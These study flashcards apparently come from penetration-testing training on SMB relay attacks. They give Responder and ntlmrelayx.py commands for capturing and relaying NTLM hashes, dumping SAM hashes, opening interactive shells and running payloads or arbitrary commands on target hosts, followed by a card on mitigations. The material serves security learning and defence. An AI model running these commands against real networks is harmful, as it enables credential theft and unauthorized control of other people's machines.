SMB Relay Flashcards

1
Q

What is SMB relay?
What are the requirements?

A

Instead of cracking hashes gathered with Responder, relay these hashes to specific machines and potentially get access.

Requirements:
1. SMB signing must be disabled on the target
2. Relayed user credentials must be admin on the target machine

2
Q

How to set up an SMB relay attack?

A
  1. Edit /etc/responder/Responder.conf to set the SMB server and HTTP server to Off
  2. Run Responder: python Responder.py -I tun0 -rdwv
  3. Set up your relay: python ntlmrelayx.py -tf targets.txt -smb2support
  4. Wait for an event to occur
  5. Get the SAM hashes of the local users of the targets
3
Q

Find targets that have SMB signing disabled and exploit them

A
  1. nmap --script=smb2-security-mode.nse -p445 CIDR_Network
  2. Take the list of all hosts that have SMB signing enabled but not required
  3. Run the relay attack
4
Q

Get an interactive shell with SMB relay attacks

A
  1. Run Responder with the SMB and HTTP servers off
  2. Run ntlmrelayx.py -tf targets.txt -i
  3. Connect to the local session that was opened: nc 127.0.0.1 11000
  4. shares
     use C$
     use ADMIN$
     ls
     You now have full control of the machine
5
Q

Get an interactive Meterpreter shell with SMB relay attacks

A

ntlmrelayx.py -tf targets.txt -smb2support -e executableName.exe

6
Q

Run a command with SMB relay attacks

A

ntlmrelayx.py -tf targets.txt -smb2support -c "commandToRun"

7
Q

Mitigations for SMB relay attacks

A
  1. Enable SMB signing on all devices
    - Pro: completely stops these attacks
    - Con: can cause performance issues with file copies
  2. Disable NTLM authentication on the network
    - Pro: completely stops the attack
    - Con: if Kerberos stops working, Windows defaults back to NTLM
  3. Account tiering
    - Pro: limits domain admins to specific tasks
    - Con: enforcing the policy may be difficult
  4. Local admin restriction
    - Pro: can prevent a lot of lateral movement
    - Con: potential increase in the number of service desk tickets